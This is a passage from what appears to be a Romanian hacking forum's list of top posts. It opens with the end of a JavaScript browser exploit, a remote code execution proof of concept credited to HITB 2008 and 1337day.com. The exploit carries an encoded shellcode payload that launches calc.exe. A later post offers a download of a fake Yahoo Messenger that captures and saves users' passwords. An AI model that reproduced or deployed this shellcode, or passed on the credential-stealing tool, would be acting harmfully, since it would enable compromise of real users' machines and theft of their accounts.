"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); f2 = test ^ fn; document.write("<br><br>w00t! w00t! u g0t r00t ?!<br>"); } (p + (f3 % n)) = fn; f0 = fn; /* f0 = fn ^ dt */ ; } } function demo() { var n; document.write("HITB 2008 missing exploit :=) by Selena<br><br>"); document.write("micro-code is written by Selena<br>"); document.write("virtual machine is designed by Selena<br>"); document.write("virtual machine is designed by Selena<br>"); document.write("virtual machine has been rewritten by nezumi<br><br>"); document.write("exploit PoC rewritten by S4(uR4 for remote atack demo 2012<br><br>"); //setTimeout(9000); document.write("[!]<b> Exploit Running"); vm_engine(); //if (n == 0) { init_t();} ; //if(result != 0){ document.write("<br><b>[+] Done!"); //} } </script> <h1>CPU cache controller bug exploit Remote code exec mod</h1> <button onClick="ThreadProc_dbg(bug)";><b>• Check vuln</b> »</button> <button onClick="demo()";><b>PoC Run!</b> ?</button> </body> # 1337day.com [2012-07-13]
    1 point
  4. Cor3Quad
    Decriptat in 2 minute si merge perfect :-> Mersi
    -1 points
  5. remix_gppd
    Va prezint un Fake Y!Messenger care salveaza parolele! Parolele se vor salva in c:/luke999/+ceva random.txt Este facut in vb6! Un printscreen cu cele 2 mess-uri: http://desmond.imageshack.us/Himg822/scaled.php?server=822&filename=ymfake.jpg&res=landing link descarcare: GirlShare - Download Fake Yahoo! Messenger by luke999.rar PS:testat pe xp sp3! VT: https://www.virustotal.com/file/a3664051bd3e504291742b05f12cbdc15c30f3a523234181e499cf9e57408aac/analysis/
    -1 points
×
×
  • Create New...